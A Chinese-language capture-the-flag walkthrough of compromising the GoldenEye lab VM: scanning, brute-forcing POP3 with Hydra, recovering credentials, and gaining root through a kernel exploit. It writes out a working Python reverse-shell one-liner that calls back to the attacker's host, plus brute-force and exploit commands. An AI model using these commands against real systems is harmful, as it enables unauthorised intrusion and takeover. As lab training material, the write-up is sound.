GoldenEye

靶机准备

将靶机ova文件导入虚拟机，并将网络模式设置为NAT

先进行ip扫描

netdiscover -r 192.168.164.0/24

kali：192.168.164.137

渗透测试

扫描端口

nmap -sS -sV -T5 -A -p- 192.168.164.189

开放了4个端口
访问80端口

给了一个路径，访问

需要登录
访问源码，发现js文件，查看源码，里面有线索


尝试解密

boris/InvincibleHack3r

尝试登录

到这再查看源码，找不到其他的东西，先放一放，刚刚扫描还发现55006，55007开放，扫一下是什么服务，

nmap -Pn -p 55006,55007 -sV 192.168.164.189

是pop，尝试连接

nc 192.168.164.189 55007

失败，在源码最后发现另一个账户：Natalya

将用户保存到文本，尝试爆破

hydra -L 2.txt -P /usr/share/wordlists/fasttrack.txxt pop3://192.168.164.189 -s 55007

共得到三个

Natalya/bird
boris/secret1!
Boris/secret1!

尝试boris/secret1!登录，没有发现有用的信息

尝试Natalya/bird登录

发现另一个用户信息，并修改Host文件severnaya-station.com进行访问。

username: xenia
password: RCP90rulez!

成功登录

经过几番查找，又发现一个账户：doak,继续爆破

获得doak的密码

doak/goat

连接pop3,又发现一个用户信息

username: dr_doak
password: 4England!

在网站登录此用户，寻找信息
找到一个文本文件，下载查看

并且发现一个admin用户

并在下载的文件中发现一个照片的路径

尝试访问

下载下来分析
在属看见一串base64编码，尝试解码，

xWinter1995x!

刚刚有个admin用户，猜测是他的密码，网站尝试登录
成功登录

getshell

使用了管理员admin用户登录页面，可以进行网站管理，在页面中找到了Site administration-Server- System paths
可以上传代码使用Python代码，进行反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.164.137",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

本地开启端口1234
将Spell engine改为PSpellShell


拿到shell

不是root权限尝试提权

提权

查看内核

uname -a

searchsploit查找linux内核漏洞

searchsploit 3.13

漏洞进行利用

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root

ssh上传
开启：/etc/init.d/ssh start
scp root@192.168.56.129:/root/1.c /tmp/


对c文件进行编译，有gcc,cc,cang,文件默认是gcc
靶机gcc未编译好，不能用gcc，只能用cc编译，需要修改37292.c编译

修改重新上传

用cc编译，赋予可执行权限后，运行exp

得到root权限，在root目录下找到flag